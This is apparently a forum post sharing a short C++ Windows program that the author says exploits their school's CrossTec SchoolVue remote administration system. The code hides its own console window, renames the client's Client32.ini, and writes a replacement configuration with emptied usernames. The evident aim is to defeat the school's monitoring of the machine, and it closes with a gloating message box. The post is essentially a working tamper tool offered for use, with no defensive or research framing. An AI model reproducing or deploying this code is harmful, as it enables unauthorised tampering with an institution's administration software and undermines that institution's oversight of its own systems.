This piece of code was used to automate an exploit I found in my school's Remote Administration System. It wasn't that difficult seeing as you just had to edit a single .ini file. Here it is.

Code:

#include <fstream>
#include <windows.h>
#include <stdio.h>
#include <cstdio>
using namespace std;

int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    FILE * File;
    HWND hWin;
    
    hWin=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(hWin,0);
    rename("C:\\Program Files\\CrossTec\\CrossTec SchoolVue\\Client32.ini", "C:\\Program Files\\CrossTec\\CrossTec SchoolVue\\Client33.ini");
    File = fopen ("C:\\Program Files\\CrossTec\\CrossTec SchoolVue\\Client32.ini","w");
    
    fputs("0x3efdc76f\n\n",File);
    fputs("[Client]\n",File);
    fputs("_present=1\n",File);
    fputs("UnloadMirrorOnDisconnect=1\n",File);
    fputs("Usernames=\n",File);
    fclose(File);
    MessageBox(NULL,"T3h 1nt3w3bz 15 NA0 jour5!","Mission Successful!",MB_OK);
	return 0;
}